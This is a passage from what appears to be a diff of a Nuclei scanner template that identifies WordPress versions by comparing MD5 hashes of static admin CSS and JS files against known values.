4.8 - 4.8.15 + dsl: + - "(\"766884f8982e0b24a1ff31017b12687c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"70fa643d71370cbaafe974ad9ca04569\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"ccae6ea537526abc82f16abac64b14fc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e113d75d86aa496a5aeebc79a426e09a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ad3c820c92c5f7916448a38c7439bdf9\" == md5(body))" + 
- type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"8ab3dc5d6517e5fb1615317ef16d9f7c\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"82a7baa833cfa3cacffe1567f417388e\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"018517f65641a4cfb139781686700457\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"8f95818bedd2456f61d3f82926bbe549\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e8ad927ed99f0cb598babf3c97c08db3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a198106b212083f8421da7a3946757f4\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"7d6a4fb31d233dcee4eba2d3bc781350\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"fd519c207095336bb57294926a09461e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"b4ddb8d0e6def1544aac502784180669\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"3133e7d3687ba997b268a0d0b920f7ca\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"01537666f87f8a05ef7bfabf9e02dd58\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1b5477771d13050c5543044bf233a88e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"273583b8f46a71877db8a1343ae5c54f\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"47956eace9eccbe53bc9dcc66e1264fd\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"a4e3d3f66e8aa6a5a1e74ea06d5a94c7\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"6e2d5da90f7faf390eb60d3554e2ff58\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"76a6b8c3745571f1ed6aed74029fe6db\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"81be30220791444b0d18847ebbe35ad1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3a62029975958cf5dedeea2b4991082c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"2497dbd6fa8ed7ec01aaa5cde5b41311\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + 
dsl: + - "(\"abc9cd9c8ba828a3ee119f294425c92a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"658bf53ecc9983a2cc34c2fb10ff4fca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"111ecdd53198846995ebd8efec9bcf36\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"195f55f6344af6ab4483de40fcaf6d46\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"42ce72342f0513eef908ca9dbd9305ea\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"7cdd958d566eef0a2bbd01d6f9f9499b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"abf8dd8f42af5684f3d80d6447e1314b\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"03c4f503d77c221c7db24be17eb1883d\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"5d83454881d2a694d0593ae6c209778c\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"62dea19210ec49e75a896a9965799ca4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"fe5319684165959b7b00b618009c3e81\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6dc7476f6b2484c728ed3cd733ac80bb\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"044393b752b8a95cdd5a8ccfccf98c6f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"ed2dded7dd6599eb0976eb63208b8e8c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4719697b45dc80a4b21ac12c129ad378\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"92fa624428349c1a4c9aa6eeee9400a3\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"c1d87fb1e7d4b5f8d925c59f2dcfa076\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"d76404feb79abd2167325e82891123b2\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2113853f02adcfec75306e443c560e3b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0fa8523bd6c90b087064560f29457c1f\" 
== md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"3eceec285e1cce89f64e729cfa5bbcb7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.2 + dsl: + - "(\"7d0250392ecd5799d667112dd3c6c1d8\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4c81508db6b5bb1c1c14764862b98360\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5d93609886b767b6a3f7faee2dbeaea7\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"dc4fc10c6cfd9719b4162726645fceb1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"202c34af21873c6dafca17c5d7506706\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"d010d243e2c088bda116a757e7566bda\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f59d6904ead9d4a9bf1f48cb3b7f9c56\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dd75b8c4476592195e9b774d0841ab15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4423bb74b238cb0e01427506aaf6ad29\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"48babc981cf0f439a769286d6a70fd48\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4d625d7805a6897ba1ee60df12e9aedc\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6dcb8d45250f00e45c0a16d7d437c0d8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"427ae769ce0a7429d7f31ed97c0c3326\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"4bd7f1b4b0aecd69638848b6c37851ff\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f578fae6b47beea325ee8dc1a8551e88\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"71386ae29d2e92d744cd0ffcfe901ff2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"246e5b303936e280ba11653683726659\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2b9341dc649763de1f36a2995bfcfbe1\" == md5(body))" + - type: dsl + name: 3.8 - 
3.8.35 + dsl: + - "(\"8d6aec11f42294c4ae1de3ab84175e2b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"163d75e9faf70bf4e002638b746af26d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a91b399efcdb75b5975efae2bcbe0588\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"7e7fc988037a570623ecdac12c6e523a\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"cc05fe38ba18674e7c6ab01c4dff6e4f\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"eedf339656fe12ca835e797320445e34\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"07c2d345729f31a530872a202078fe3e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"7ae4b6de28dfa29eaf07b5448e27c47a\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"7585650095d07481bf58bac7737e0d0c\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"56b3176fa896ff69ebea6d6689f1b5df\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"adc9f326e31941258e8e50707a93c1eb\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"eb025ed3405f65138e2fe7cd62b27508\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"3bc7a38b3a83079b9abd2245709f7b2b\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"73fe3708cb1c253dd50d5be65f8777dd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"fe3a02ff20d8154cdd66aad359c8a8e4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6875a80f6acd9176e518bcd86c364a91\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2ca82cd79424ae65f081f348da6f3470\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"38de8fc52993f0f910be3d62a7637c33\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"16375f6512d5a1e04dbb884a02ba658a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"6f3943ff4694f87dae30d02cfba0d89f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - 
"(\"856763d80eab181268a361510f4f2e35\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f8a412c8321caa8f9fc3b9d6ed078740\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ebd0cc92129d8f29fa8b66daa23215eb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fb09060e3a7d4ab6357a830546acb8b2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9369c3961b4f2d155e6a4ea8252e31ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6cfac42246a04c9f37f0a0e5f0474ee4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"44521ff25481d95b5d100c55dfdb45f4\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.5.23 + dsl: + - "(\"3f9cc5665ff4fe488894068b1b880d74\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"413b428336916273e3853a581f5ab851\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"63fd697c7d66f00cefc6430b8c53c92f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b14a525c6e9153ceaa71eb4561ac5991\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"fddaef0932cdd73ecf654d5d40a98ff0\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"863c40a4a54cf53e5102a5133faa19f8\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"8a6348b4b6ccb6fdc485912383cddb04\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"2c5edd9df2864f480f946256022c9f44\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"00172ff53b67ee3b773504420e7de431\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"f74c1ba83ff35888d3dd2e3521897db5\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"dd01c7f5e1b9ca4326267bd246dbd770\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"c524fa61292b138710930f5ccf1dcd23\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e617e3e2931143c28cb3514d2db5b583\" == 
md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"3f03bce84d1d2a169b4bf4d8a0126e38\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f00b01f80b2ed4e5f6753b602258874c\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"1f09b6343caf9dc71b30d0ff0d90c69b\" == md5(body))" + - type: dsl + name: 2.7 + dsl: + - "(\"aebe2414d81a87d6c2c9273654035fcd\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"0c2295f3e8ea03dd5346a6abec16a456\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"a436fd5bc5fe11fed6acbd8371e09102\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"4d76da5b913eec43f31a10b6c367f43e\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"6e0efaa35b424792e180c3c619b9823f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9b1d754d27a657a24b8268d87a4a96ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e0024121a80cefb48c958fc6995db24b\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"0b4536fbe48b791795347557f46f4efe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4536ea8aec28f17e07af54c59db561a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f4496a75c16e381d993ec316e783f9bb\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"57d1d231d84d16e1068f6af8219c16bb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1299184d799f3a39b6abfb8510ae2b88\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"04e2e4400bf7e6b04c7a9e0bef9abd92\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"65a579b1e541380cf3336329c84549fa\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"66c0c54fea80c201db7daabadef8cd8b\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"eca5a62aacdb686c26e850a4529662a8\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - 
"(\"cc1d6cd9b4a4079012a04ec96638bbf4\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"29fc9bc51f8f284c4751acb59307c07a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"803ea865916c3973a37a371542e92383\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"96c50e7ed61f473ae43fea164c028c5a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"96705cdff8c2ed47003b981751c25d99\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"4f01f1edbe0fd8a3c68bbdac926be2fe\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"a3598123987864a73435983381d38259\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"f6f2b87658db8690a979b86c13bc869f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"e11e33d6475e302b41caa4020143b224\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"1f735128e0e972560912127d06a124cf\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"59b2a3edb413dba510ec0624445d35d7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"3ef1bf8fd20257c9285115ad1a514cb2\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"de8f811db5ab98f7759282ebc81b4dcb\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"dd21416d0bf77cf56c6e29abe9d806d7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2844ed0207b54d314de52aa5024a188c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"518511a9badf54b58f9a724a67be1599\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3ed49f9aee0b3dc258e936fa867da7b7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"86ccf56bbf7478ef06b2bf12e93bdc3c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2a0f5af4182bc19d0c8a64a537ea950f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1ed4faf7c47d02536474cfbe258892ba\" == md5(body))" + 
- type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8d6461b9e7a10f2635880587e37688c8\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"3b0c7a4c53c44f527276ed85520f94f8\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"81f0f785dbd8eee0a11d054a3cbdf606\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f41708257e8e6bc89bd375f82a8bc290\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e8da14cd4be51ae220b531dcd14d7069\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"eeff6a0a49c73df137e0829b232fafe2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"a8f65f404867e7d00ef30c4312e4ae5a\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"3474da40a63cf7441990d7af14e1dd96\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"2a75a758f97514530f0ae7ba984e9392\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"6f94711934da6b3ffb9b7aa44c595613\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"714e9274f3615454701ea9ee0ced8b5f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"7b8cd77767df9b74c2ba9758a5ae61d4\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"3056f4e370a1881381f87d058a505e13\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"03b3fc0c51132338e6b04efe3111aac9\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"80412e2251dc758231d2aa30ece06d42\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"854e9fea900d9e1b9323337290511600\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"8429b24e45bab0f571f2899f40089316\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"db80bf8f1deb332d3449ed81457ba565\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"58d84231e24daae117fe2385566f19f1\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"6a5851a95ac74681b84c89f34a83d526\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + 
dsl: + - "(\"4bf51bc15cee9b14c27cd2a228827864\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"a4490a668e75cdfaa5d0155a15c2d785\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"d80fd8aacd4775600a95c8a725924c2c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7f8fceaf55013fd941fb68698f407de0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2103d4b114317943ec992cb762a5b43a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b1ccd63fd1eb7b7c83e0c18f4a41631e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"19783c0c8c8225b3fc31ea04e77ee50a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2adb75111fe6bd2d079f1a4382e43806\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b8f5ef44ca185e2efe7b8205a2e35e1a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"920d13a170db44958b3e0a3eb6bbf65a\" == md5(body))" + - type: dsl + name: 4.9.2 - 4.9.4 + dsl: + - "(\"f66191b422f0fb03659565a9fe2cbf31\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"595620900f9d6ee0537856376b500bb6\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"f290461e922fb41355a1cce6d1afcae3\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"d0ab761a7e48baab74afdd85a669c9e6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"17f162d041245ca50ed4f8eda0d3938b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"cfa9e1f2a74fb8c9181b1a4faffec319\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"acccbab4b6f7167f75de702337c15082\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"2922dadefceb4936fef52c2fd9eca7e5\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"0154ab68beb21987369fe4f9f96e505e\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"404c6d0aec7bd9536097b66367fe609c\" == 
md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"df5accb5efc55900010fc8dbc7288c0d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"673f08c43f68205d1be3c61e8e643ccb\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"e4c9d150e9d0879e6f4f49e8499db573\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"87c166494be181c0191a2aa8f5353804\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ad5ad5176f246f2c063e6b17b204f6fa\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"27484d633876a355cfb93659f226c355\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"780232f685803f5815fbcc8cc34e6f51\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9acd2c0bc2d9c3e1ae244b37a1c16093\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/common.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"94a8c9759cf395d67c51ad99801749b2\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b1992b6de3600f82b893aa6123f2972d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"81aef5364d1de5aff6e2f7577a161564\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"726ff561c2ff8ea1b521774e18fa6be4\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"cf2cfe5b33d2c6a1a2afd50128902698\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f78ebe20922d0a67cacf2ec916d89e1c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6942f692b44491261619b43859b8acfc\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"64d0b35ed52e9b2c23e5e392a7a430b2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"588b195e5c6ac9aedeaf5a8d15392cac\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"da4a644688036daca94c760935e9667f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e52c17a7a6b58bb9f34a9ee0b925dce2\" == md5(body))" + - type: dsl + name: 
4.9.2 - 4.9.4 + dsl: + - "(\"5fff0139cf41e8f2bfc402c8bda13182\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"9d21197ec7821a31b6cb867a509eea42\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"fcd549c0099cc4b73431636d5b34a2d8\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"73f78da3cc978e1a179fb7972723a1e0\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"9410a07983a1c5cbf0f46f54222ae03b\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"6488275ef0769671a1ee7f3aa57288dc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"984d0a5c5d116af8a4004428f0b5ee20\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"7988ef149cc8447a3a47ae12832e5abb\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"3a83fc2978cd1dd143e2973281aaeb6c\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"f6e888d4a9f434e361e646d0b7d11864\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"8ac7ee2240fd68c28aff2ff4158fbc39\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9cff57b3df1f72314b4f4fb3668c9fba\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"2561f3fa21e6a465078399f9a3495809\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.1 + dsl: + - "(\"19e7bae79deb7d7598d42ec0a1cf715c\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"e573595eef2d3bfd7767fdec685b1bae\" == md5(body))" + - type: dsl + name: 5.4.2 - 5.4.4 + dsl: + - "(\"4213c7f0717c905c9cd12752a9b8358a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"50d8c6430b9e115b2bf2a0047043b7d2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2d54476191767139e8ae7aaef8b3653f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/post.js" + matchers: + - type: dsl + name: 4.7 - 4.9.5 + dsl: + - "(\"410fd99a0aca02dcf6abda8b98222d99\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f973910442293f747aedd8df81542222\" == 
md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2113b842b04cb770f09f80b71b35bd41\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"c660f729afcf0339a26ad7cee25eb45b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b30a814a7fa9ea4b03498d7f4d8e3b2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"995f94db4b9e67b27b3d71ca72624988\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"24daf495d09243fe7a3eb040d58ddcc7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d4beb52b277333b38bf53fa07309f192\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"871f0866df7ba56493e97a1a21b82b53\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"6578ae8741421df2c6b352f92684140d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"8bba20755890a66db03ed0d606e17c4c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"3149dd38216585bd7d68e89da427cfb0\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"7270887faa737b6ab4012ae16e0d2ecf\" == md5(body))" 